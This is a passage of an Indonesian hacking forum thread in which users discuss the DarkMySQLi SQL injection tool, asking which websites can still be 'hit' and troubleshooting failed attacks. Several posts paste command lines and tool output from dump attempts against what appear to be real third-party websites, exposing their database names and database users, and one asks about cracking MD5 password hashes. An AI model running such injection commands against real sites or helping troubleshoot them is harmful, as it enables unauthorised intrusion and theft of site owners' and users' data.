darkMySQLI tutorial step by step
#21
oche bang udah ketemu....asyik sekali

#22
(12-12-2011, 11:18 AM)biecyber Wrote: bro zee, ane mau tanya, apakah itu hanya berlaku untuk situs2 yang masih pake php native ya ?? yang query string nya masih pake tanda tanya '?id=1', nah kalo misalnya ya udah anti SQL injection, model" website sekarang yang udah banyak pake framework gmn ??? apa masih bisa kita hajar pake SQL Injection ??? mohon pencerahan.

sebetulnya untuk meng inject suatu website itu enggak smua pake teknik sql injection. hanya beberapa saja yang bisa di sql injection biasanya cms2 gratisan atau gk cms buatan pribadi, bug sql injection itu termasuk bug lama kalo kata ane cz udah jarang di temukan. kalo misalnya sperti joomla atau worpress sperti itu udah gk pake teknik sql injection lagi tp pake teknik lain sperti pemanfaatan bug dari plugin yg dipakai dr website tersebut
[shcode=This_site_xss-ed]

#23
(12-12-2011, 08:42 PM)koecroet Wrote:
(12-12-2011, 11:18 AM)biecyber Wrote: bro zee, ane mau tanya, apakah itu hanya berlaku untuk situs2 yang masih pake php native ya ?? yang query string nya masih pake tanda tanya '?id=1', nah kalo misalnya ya udah anti SQL injection, model" website sekarang yang udah banyak pake framework gmn ??? apa masih bisa kita hajar pake SQL Injection ??? mohon pencerahan.

sebetulnya untuk meng inject suatu website itu enggak smua pake teknik sql injection. hanya beberapa saja yang bisa di sql injection biasanya cms2 gratisan atau gk cms buatan pribadi, bug sql injection itu termasuk bug lama kalo kata ane cz udah jarang di temukan. kalo misalnya sperti joomla atau worpress sperti itu udah gk pake teknik sql injection lagi tp pake teknik lain sperti pemanfaatan bug dari plugin yg dipakai dr website tersebut

waduh, kren bro koecroet, makin mateng aja dah. nice ^^
echo (attacked==1) ? defend : counter attack;

#24
kenapa pas mau di dump begini ya om ?

[+] Gathering MySQL Server Configuration...
Database: www-bcspeakerstest
User: www-bcspeakersro@localhost
Version: 5.0.77
[+] Dumping data from database "www-bcspeakerstest" Table "utenti_ftp"
[+] and Column(s) ['user']
Traceback (most recent call last):
File "DarkMySQLi.py", line 840, in <module>
match = match[0][2:].split("\x1e")
IndexError: list index out of range
root@nosetrave:~# ./plagiat.sh
English motherfucker, do you speak it ?
root@nosetrave:~#


#25
kak..! yang pas di [+] Testing: 1,2, ! ane sampe mncapai lbih dri 180 ..! itu ngak error yah punya ane, mohon pencerahan...! AngryAngryAngry

#26
ijin test drive juga kk, thanks yak Big Grin
Semua orang adalah guru
Semua tempat adalah sekolah

#27
untuk injeksi web joomla gimana ya?
apakah bisa dengan darkmysql ini?
ato ada cara lain untuk injeksi web joomla?/
<< back|track'ers newbee

#28
root@sandi:/pentest/web/darkmysqli# python DarkMySQLi.py -u http://www.ciptaagro.com/artikel/artikel...darkc0de,5-- --dump -D ciptaagr_cas_database -T Columns -C 5

|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.ciptaagro.com/artikel/artikel...darkc0de,5
[+] 17:55:46
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ciptaagr_cas_database
User: ciptaagr_cas2@localhost
Version: 5.1.56
[+] Dumping data from database "ciptaagr_cas_database" Table "Columns"
[+] and Column(s) ['5']
Traceback (most recent call last):
File "DarkMySQLi.py", line 840, in <module>
match = match[0][2:].split("\x1e")
IndexError: list index out of range
root@sandi:/pentest/web/darkmysqli#


nah error itu apa bagaimana menangani nya om Zee
\Xion@\Root:~# apt-get install Brains-Backtrack

#29
ajib om zee . . .
ijin coba
Spoiler! :
<<Back|Track
☆‍‍‍‍☆‍‍‍‍☆‍‍‍‍☆☆


#30
om zee bukanya passwordnya masih di enkripsi md5







Users browsing this thread: 1 Guest(s)